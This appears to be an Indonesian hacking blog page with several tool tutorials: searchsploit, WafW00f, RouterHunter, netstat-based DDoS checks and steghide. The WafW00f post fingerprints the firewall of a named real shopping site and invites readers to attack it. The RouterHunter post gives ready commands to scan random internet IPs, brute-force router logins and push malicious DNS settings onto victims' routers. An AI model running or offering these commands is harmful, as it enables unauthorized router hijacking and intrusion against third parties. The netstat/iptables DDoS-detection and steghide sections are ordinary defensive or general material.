Mudahnya Mencari Exploit Dengan Searchsploit di Linux

November 29, 2016 1 Comment
Yang suka bermain-main dengan exploit mestinya tau dengan Exploit-db yak exploit-db merupakan website yang menyediakan kumpulan dari beberapa kerentanan dan code exploit dari seluruh dunia, Seiring berjalannya waktu, pihak developer exploit-db membuat tools opensource untuk mempermudah pengguna exploit-db agar user mudah mengakakses tanpa masuk ke website exploit-db tersebut.


Searchsploit merupakan sebuah tools security opensource yang menyimpan berkas-berkas exploit yang ada pada exploit-db, hal ini agar kita mudah mengakses exploit yang ada di exploit-db tanpa masuk ke situs eploit-db yang saya jelaskan tadi di awal.

Installasi  

Pada sistem Unix, semua yang kalian perlukan adalah baik "coreutils" atau "utilitas" (mis bash, sed, grep, awk, dll), serta "git". Ini diinstal secara default pada banyak distribusi Linux yang berbeda, termasuk OS X / MacOS.

 git clone https://github.com/offensive-security/exploit-database.git /opt/exploit-database
 

Langkah opsional yang akan membuat menggunakan SearchSploit mudah adalah dengan memasukkannya ke dalam $ PATH.
Contoh: Pada output berikut, kalian dapat melihat bahwa direktori "/usr/local/bin" termasuk dalam variabel lingkungan $ PATH.

 root# echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
root#
 

Gunakan perintah dibawah ini agar kalian dapat membuat link simbolik dalam "/usr/local/bin" direktori yang menunjuk ke searchsploit, memungkinkan kalian untuk menjalankannya tanpa memberikan path lengkap.

 root# ln -sf /opt/exploit-database/searchsploit /usr/local/bin/searchsploit
root# 

Jika sudah selesai install kemudian update searchsploit kalian.

 root# searchsploit -u 

Untuk melihat opsi-opsi tools searchsploit ketik "searchsploit -h"

 root# searchsploit -h 

Penggunaan

Contoh mencari exploit di searchsploit


Dilihat dari gambar jelas keterangannya nama exploit Oracle, dibuat dengan code c dan ruby, exploitnya untuk windows dan letaknya di /opt/exploit-database/platforms. Sekian dari saya selamat mencoba dan selamat malam Good Luck!!!



Deteksi Firewall (WAF) Pada Suatu Website Dengan Tools WafW00f di Linux

November 27, 2016 1 Comment
Udah lama gak update semenjak keluar dari dunia persilatan haha, Kali ini saya akan share tutorial sederhana "Deteksi Firewall (WAF) Pada Suatu Website Dengan Tools WafW00f di Linux" ada yang tau apa itu WAF mestinya kalau anda seorang pentester sudah tau dong apa itu WAF, Namun bagi kalian yang belum tau apa itu WAF coba baca lagi di WAFwikipedia[dot]org. Oke selanjutanya saya akan bahas mengenai toolsnya.


WafW00f
  • WAFW00F sebuah tools yang fungsinya untuk mengidentifikasi Application Firewall (WAF)  dan produk sidik jari Web.
Cara Kerja WafW00f
  • Mengirimkan permintaan HTTP normal dan menganalisa respon; ini mengidentifikasi sejumlah solusi WAF
  • Jika itu tidak berhasil, ia akan mengirimkan jumlah permintaan (berpotensi berbahaya) HTTP dan menggunakan logika sederhana untuk menyimpulkan WAF
  • Jika itu juga tidak berhasil, WafW00f akan menganalisis tanggapan sebelumnya dikembalikan dan menggunakan algoritma sederhana lain untuk menebak jika WAF atau solusi keamanan secara aktif menanggapi serangan
Deteksi Jumlah WAF

Berikut output untuk mendeteksi jenis-jenis WAF pada tools WafW00f keluarannya.
  • Profense
  • NetContinuum
  • Incapsula WAF
  • CloudFlare
  • NSFocus
  • Safedog
  • Mission Control Application Shield
  • USP Secure Entry Server
  • Cisco ACE XML Gateway
  • Barracuda Application Firewall
  • Art of Defence HyperGuard
  • BinarySec
  • Teros WAF
  • F5 BIG-IP LTM
  • F5 BIG-IP APM
  • F5 BIG-IP ASM
  • F5 FirePass
  • F5 Trafficshield
  • InfoGuard Airlock
  • Citrix NetScaler
  • Trustwave ModSecurity
  • IBM Web Application Security
  • IBM DataPower
  • DenyALL WAF
  • Applicure dotDefender
  • Juniper WebApp Secure
  • Microsoft URLScan
  • Aqtronix WebKnight
  • eEye Digital Security SecureIIS
  • Imperva SecureSphere
  • Microsoft ISA Server
Installasi

Untuk menginstall tools tersebut kamu tinggal pilih script di bawah ini.

 python setup.py install 

 pip install wafw00f 

Untuk installasi di ubuntu gunakan perintah berikut

 sudo pip install wafw00f 

Contoh Penggunaan

Target saya disini sebuah website perbelanjaan www.salsastore.com saya ingin menguji apakah website tersebut terdapat firewal WAF atau tidak dan ketika di check.


Ternyata website tersebut menggunakan firewall WAF produk dari Ibm Security. Nah jika sudah ketahuan terserah kalian mau ngapain website yang kalian incar mungkin mau bypass waf atau apalah terserah kalian. Selamat mencoba Good Luck!!

Router Hunter Tools Hack Router Power Full In Linux

November 18, 2016 Add Comment
Kemarin sudah bahas tentang tools hack router (Routersploit) di linux, Kali ini saya akan bahas sama juga mengenai tools hack router (Routerhunter) juga di linux.


Sekilas tentang Routerhunter merupakan alat keamanan otomatis di ciptakan oleh Jhonathan Davi A.K.A jh00nbr yang di gunakan untuk menemukan kerentanan dan melakukan tes pada router dan perangkat rentan di Internet. Routerhunter dirancang untuk mencari ips trek yang sudah ditentukan atau acak, secara otomatis mengeksploitasi DNSChanger dan kerentanan pada router.

Download: Github

Penggunaan

  -range 192.168.1.0-255, --range 192.168.1.0-255  Set range of IP
  -bruteforce, --bruteforce                        Performs brute force with users and passwords standards, and soon    after defines the malicious DNS.
  -startip 192.168.*.*, --startip 192.168.*.*      Start - IP range customized with wildcard / 201.*.*.*
  -endip 192.168.*.*, --endip 192.168.*.*          End - IP range customized with wildcard / 201.*.*.*
  -dns1 8.8.8.8, --dns1 8.8.8.8                    Define malicious dns1
  -dns2 8.8.4.4, --dns2 8.8.4.4                    Define malicious dns2
  --threads 10                                     Set threads numbers
  -rip, --randomip                                 Randomizing ips routers
  -lmtip 10, --limitip 10                          Define limite random ip 

Dasar perintah exploitasi

Exploit random ips

 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10                      
python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10
 

Scanner di range ip

 Tpython routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 10
 

Kisaran IP disesuaikan dengan wildcard / Ex: --startip 201.*.*.* -  --endip 201.*.*.*

 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10 

Brute force dengan pengguna password pada router yang memerlukan otentikasi, memaksa perubahan dns

 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10 

Sekian dari saya selamat mencoba Good Luck!!

Cara Memverifikasi Serangan Ddos Dengan Perintah Netstat Pada Terminal Linux

November 15, 2016 2 Comments


Denial-of-service attack (DoS) atau Distributed Denial-of-service attack (DDoS) adalah suatu usaha untuk membuat sebuah mesin atau jaringan menjadi lumpuh agar tidak di bisa diakses terutama oleh client.

Serangan ini umumnya menargetkan situs atau layanan host server (web) seperti bank, gateway, pembayaran kartu kredit, atau bahkan name server root. 

Serangan DoS diimplementasikan dengan baik memaksa komputer ditargetkan untuk me-reset, atau mengkonsumsi sumber daya sehingga tidak bisa lagi memberikan layanan atau menghalangi media komunikasi antara pengguna dan korban sehingga mereka tidak bisa lagi berkomunikasi secara memadai.

Kali ini saya akan menunjukkan kepada kalian cara memeriksa apakah server kalian sedang di serang atau tidak, Dengan perintah "Netstat" maka kalian akan mengetahuinya.

Berikut contohnya

 amrul@root:~$ netstat -na 

Tampilkan semua koneksi internet aktif untuk server dan koneksi untuk lainnya

 amrul@root:~$ netstat -an | grep :80 | sort 

Tampilkan hanya koneksi internet aktif ke server pada port 80, ini adalah port http dan jadi berguna jika kalian memiliki web server, dan mengurutkan hasil. Juga berguna dalam mendeteksi banjir tunggal dengan memungkinkan kamu untuk mengenali banyak koneksi yang berasal dari satu IP.

 amrul@root:~$ netstat -n -p|grep SYN_REC | wc -l 

Perintah ini berguna untuk mengetahui berapa banyak yang aktif SYNC_REC yang terjadi pada server. Jumlah tersebut harus cukup rendah, sebaiknya kurang dari 5. Pada insiden serangan DoS atau bom mail, nomor dapat melompat cukup tinggi. Namun, nilai selalu tergantung pada sistem, sehingga nilai tinggi mungkin rata-rata pada server lain.

 amrul@root:~$ netstat -n -p | grep SYN_REC | sort -u 

Daftar keluar semua alamat IP yang terlibat bukan hanya menghitung.

 amrul@root:~$ netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}' 

Daftar semua alamat IP yang unik node yang mengirim status koneksi SYN_REC.

 amrul@root:~$ netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 

Gunakan perintah netstat untuk menghitung dan menghitung jumlah koneksi setiap alamat IP membuat ke server.

 amrul@root:~$ netstat -anp |grep 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 

Count daftar jumlah koneksi IP yang terhubung ke server menggunakan protokol TCP atau UDP.

 amrul@root:~$ netstat -ntu | grep ESTAB | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr 

Memeriksa koneksi semua koneksi  established, dan menampilkan koneksi menghitung untuk setiap Ip.

 amrul@root:~$ netstat -plan|grep :80|awk {'print $5'}|cut -d: -f 1|sort|uniq -c|sort -nk 1 

Tampilkan alamat daftar IP dan jumlah koneksi yang terhubung ke port 80 pada server. Port 80 digunakan terutama oleh permintaan halaman web HTTP.

Bagaimana untuk mengurangi serangan dos

Setelah menemukan IP yang menyerang server, kamu dapat menggunakan perintah berikut untuk memblokir koneksi mereka ke server

 iptables -A INPUT 1 -s $IPADRESS -j DROP/REJECT 

Harap diingat bahwa kamu harus mengganti ip address dengan nomor IP yang telah ditemukan dengan netstat.

Setelah menembakkan perintah tersebut, disconekkan semua koneksi httpd untuk membersihkan sistem kamu dari layanan restart httpd. Sekian dari saya selamat mencoba Good Luck!!!

Teknik Menyembunyikan Pesan Dengan Tools Steghide (Steganografi) di Linux

November 15, 2016 Add Comment
Dikutip dari wikipedia.org Steganografi adalah seni dan ilmu menulis pesan tersembunyi atau menyembunyikan pesan dengan suatu cara sehingga selain si pengirim dan si penerima, tidak ada seorangpun yang mengetahui atau menyadari bahwa ada suatu pesan rahasia. Sebaliknya, kriptografi menyamarkan arti dari suatu pesan, tapi tidak menyembunyikan bahwa ada suatu pesan. 



Sekilas Tools Steghide

Steghide adalah program steganografi yang mampu menyembunyikan data dalam berbagai macam Image- dan audio file. The warna-respectivly sampel frekuensi tidak berubah sehingga membuat embedding tahan terhadap uji statistik orde pertama.

Fitur:
  • kompresi data tertanam
  • enkripsi data tertanam
  • embedding dari checksum untuk memverifikasi integritas data ekstrak
  • dukungan untuk JPEG, BMP, WAV dan AU file

Menyembunyikan Pesan

Untuk menyembunyikan pesan dalam gambar cukuplah mudah yang pertama terlebih dahulu download toolsnya kemudian install 

Siapkan dua metode untuk praktek (teks yang berisi pesan) dan (foto sebagai media penyimpanan) 


Syntax

 amrul@root:~$ steghide embed -cf fotoyangdigunakan -ef pesanyangdipakai 

Jika sudah disediakan metodenya, penggunaanya seperti berikut

 amrul@root:~$ steghide embed -cf cewekcantik.jpg -ef duniaperetas.txt

Tambahkan password jika kamu ingin menambahkan password jika tidak next aja


Menampilkan Pesan

Untuk menampilkan pesan cukuplah mudah "syntaxnya" seperti berikut

 amrul@root:~$ steghide extract -sf fileyangsudahdibuat

Contoh penggunaan

amrul@root:~$ steghide extract -sf cewekcantik.jpg

Maka hasilnya seperti gambar dibawah untuk menampilkan isi pesan gunakan media cat


Sekian tutorial teknik menyembunyikan pesan dengan tools steghide di linux apa bila ada kesalahan atau penulisan mohon maaf sebesar-besarnya selamat siang dan selamat mencoba Good Luck!!